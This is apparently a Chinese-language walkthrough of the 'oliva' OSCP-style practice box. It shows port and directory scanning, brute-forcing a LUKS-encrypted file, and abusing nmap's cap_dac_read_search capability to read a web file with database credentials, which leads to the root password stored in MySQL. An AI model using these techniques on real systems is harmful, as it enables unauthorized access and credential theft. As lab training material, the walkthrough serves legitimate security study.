【OSCP】oliva

OSCP 靶场

靶场介绍

信息收集

主机发现

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.104
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-05 22:00 EST
Nmap scan report for 192.168.1.104
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)
|_  256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
MAC Address: 08:00:27:20:C2:40 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.104 -x php,txt,html -e

这里点击后下载这个文件

file 查看是一份LUKS v2 加密文件

./bruteforce-luks -t 4 -f /usr/share/wordlists/rockyou.txt -v 10 oliva

爆破获取加密口令后，我们使用cryptsetup打开该文件

打开后文件是在这个路径下创建的 /dev/mapper/olive_img，然后我们可以mount 命令挂载该文件。

mount /dev/mapper/olive_img /mnt

进去里面可以看到一份密码

或者使用文件管理器打开文件

cryptsetup open --type luks oliva oliva

权限获取

使用上面的账号密码成功登录获取flag

权限提升

使用linpeas.sh 提权脚本，发现

getcap 命令是在 Linux 系统中用于查看文件的特殊权限（capabilities）的工具。

oliva@oliva:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep

“cap_dac_read_search=eip”是指Linux操作系统中与文件访问权限相关的概念。“cap_dac”代表“任意访问能力”，指的是基于文件所有者、组和其他用户的权限。下面我们尝试使用nmap 打开如下的文件,获取mysql的账号密码，提示说是root的账号密码，尝试登录并不是。

nmap localhost -iL index.php
nmap -iL index.php
-iL 批量扫描1.txt中的目标地址

本地登录mysql 数据库后，在里面找到了root 的账号密码

oliva@oliva:/var/www/html$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or g.
Your MariaDB connection id is 8
Server version: 10.11.3-MariaDB-1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| easy               |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0,017 sec)

MariaDB [(none)]> use easy;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [easy]> show tables;
+----------------+
| Tables_in_easy |
+----------------+
| logging        |
+----------------+
1 row in set (0,000 sec)

MariaDB [easy]> select * from logging
    -> ;
+--------+------+--------------+
| id_log | uzer | pazz         |
+--------+------+--------------+
|      1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,018 sec)

MariaDB [easy]> 
                                                                                                                                           
                                   

原文始发于微信公众号（贝雷帽SEC）：【OSCP】oliva